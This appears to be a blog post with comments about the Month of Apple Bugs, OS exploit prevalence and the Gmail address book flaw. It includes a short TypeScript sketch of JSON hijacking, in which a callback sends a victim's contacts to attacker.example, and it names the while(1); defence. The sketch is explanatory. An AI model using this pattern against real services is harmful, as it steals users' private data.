It’s too bad I’m not teaching my Cyberattacks class again this January, because the Month of Apple Bugs would be a great resource. I always run that class on Windows PCs because, statistically, there are just more Windows exploits out there right now, but it’s important to remember that no operating system is immune. We should expect that, as Apple continues to grow its market share, OS X exploits will become more common too. What’s interesting is how many exploits no longer come through traditional operating system holes, but instead take advantage of online services that play some of the roles of an operating system, such as the recent Gmail address book vulnerability. None of the cases I’ve seen calls for predictions of doom and destruction, but I anticipate that the next hard push in security education will be teaching the average user about the sheer breadth of vulnerable points in their everyday computer use.
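For the curious, the Gmail address book issue was an instance of what’s now called cross-site script inclusion, or “JSON hijacking.” Here’s a minimal sketch of that attack class, written as browser-side TypeScript; the URLs and the callback name are hypothetical illustrations, not the actual exploit:

    // Sketch of cross-site script inclusion ("JSON hijacking").
    // All URLs and the callback name here are made up for illustration.

    // The attacker's page defines the callback the vulnerable feed invokes.
    (window as any).processContacts = (contacts: unknown) => {
      // Exfiltrate the victim's address book to an attacker-controlled server.
      new Image().src =
        "https://attacker.example/log?data=" +
        encodeURIComponent(JSON.stringify(contacts));
    };

    // <script> tags are exempt from the same-origin policy, so the browser
    // fetches the feed with the victim's session cookies and executes it.
    const tag = document.createElement("script");
    tag.src = "https://mail.example/contacts?out=js&callback=processContacts";
    document.body.appendChild(tag);

The point is that the hole isn’t in the operating system at all: the defenses that grew out of this class of bug, like prefixing JSON responses with an unparseable token such as while(1);, had to come from the service, not from an OS patch.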
As any OS climbs in popularity, it makes sense that more exploits would be available and actively worked on. After all, who would want to waste an attack on less than 10% of desktop computers?
The question is, is Windows really more vulnerable to attack than something like OS X or Linux, or does it just look that way because it’s by far the most common, and therefore most attacked, OS? That’s open to debate; I don’t believe there’s a real answer to it.
Vulnerabilities will always exist; there is no perfect code. The average user has no idea of the number of vulnerabilities out there.
The average user will never know about the number of vulnerabilities. After all, chances are this is the same user who Post-It Notes his username and password to the monitor.
It’s a constant war between designers trying to build better and more secure software, and the universe trying to design better and more incompetent idiots. So far the universe is winning.